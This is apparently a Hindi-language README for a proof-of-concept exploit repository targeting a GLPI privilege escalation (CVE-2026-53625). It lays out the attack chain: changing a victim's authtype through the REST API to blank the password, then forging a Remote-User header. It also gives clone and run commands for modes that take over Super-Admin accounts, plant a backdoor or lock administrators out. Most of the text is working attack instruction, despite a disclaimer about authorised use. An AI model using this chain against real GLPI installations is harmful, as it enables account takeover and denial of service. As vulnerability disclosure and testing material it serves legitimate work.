
authtype हेरफेर के माध्यम से GLPI विशेषाधिकार वृद्धि PoC - CVE-2026-53625। GLPI भेद्यता के लिए नैतिक PoC जो एक Technician को REST API authtype हेरफेर के माध्यम से किसी भी Super-Admin खाते का पूर्ण नियंत्रण लेने की अनुमति देता है।
यह रिपॉजिटरी CVE-2026-53625 के लिए एक नैतिक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) प्रदान करता है, जो GLPI में उच्च गंभीरता वाली विशेषाधिकार वृद्धि भेद्यता है जो 0.70 से 11.0.7 तक के सभी संस्करणों को प्रभावित करती है।
एक निम्न-विशेषाधिकार वाला उपयोगकर्ता (तकनीशियन) REST API के माध्यम से authtype फ़ील्ड में हेरफेर करके Super-Admin सहित किसी भी खाते का पूर्ण नियंत्रण ले सकता है। यह हमला तीन कमजोरियों को जोड़कर स्थायी बैकडोर निर्माण के साथ पूर्ण खाता अधिग्रहण प्राप्त करता है।
आधिकारिक परामर्श: GHSA-94rp-v9f2-5rj7
जब कोई उपयोगकर्ता REST API के माध्यम से किसी अन्य उपयोगकर्ता के रिकॉर्ड को अपडेट करता है तो GLPI विशेषाधिकार स्तरों की जाँच नहीं करता है। authtype फ़ील्ड सुरक्षित नहीं है, और इसे EXTERNAL में बदलने से GLPI स्वचालित रूप से पीड़ित के पासवर्ड को रिक्त कर देता है। एक जालसाज़ी करने योग्य SSO हेडर (Remote-User) के साथ मिलकर, यह पूर्ण खाता अधिग्रहण की अनुमति देता है।
POST /apirest.php/initSession)
GET /apirest.php/User)
PUT /apirest.php/User/{id} के माध्यम से पीड़ित के authtype को EXTERNAL (4) में बदलें — GLPI पासवर्ड को स्वचालित रूप से रिक्त कर देता है
(User.php:1277)
Remote-User: {victim} HTTP हेडर जाली बनाएं
— किसी पासवर्ड की आवश्यकता नहीं
SSO कॉन्फ़िगर न होने पर: हमला फिर भी DoS के रूप में काम करता है — पीड़ित का पासवर्ड रिक्त कर दिया जाता है और वे लॉक आउट हो जाते हैं। इस प्रभाव के लिए किसी SSO की आवश्यकता नहीं है।
यह PoC केवल शैक्षिक और अधिकृत परीक्षण के लिए है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जहाँ आपके पास स्पष्ट अनुमति है। लेखक और योगदानकर्ता दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।
रिपॉजिटरी क्लोन करें:
git clone https://github.com/7h30th3r0n3/CVE-2026-53625-GLPI-PoC.git
cd CVE-2026-53625-GLPI-PoC
निर्भरताएँ: bash, curl, python3, openssl
PoC दो हमले मोड का समर्थन करता है:
# Full takeover chain (default) — requires SSO with forgeable header:
./poc_authtype_takeover.sh --auto http://glpi.local tech P@ss
# DoS only — lock out admin, no SSO needed:
./poc_authtype_takeover.sh --lockdown --auto http://glpi.local tech P@ss
# Safe mode — prove chain on sacrificial user, zero impact on real accounts:
./poc_authtype_takeover.sh --safe --verbose http://glpi.local tech P@ss
# Full takeover + restore victim afterward:
./poc_authtype_takeover.sh --backdoor --restore --restore-pass 'NewPass!' --auto http://glpi.local tech P@ss
सभी विकल्पों के लिए ./poc_authtype_takeover.sh --help चलाएँ।
भेद्यता की खोज की गई और PoC 7h30th3r0n3 द्वारा विकसित किया गया।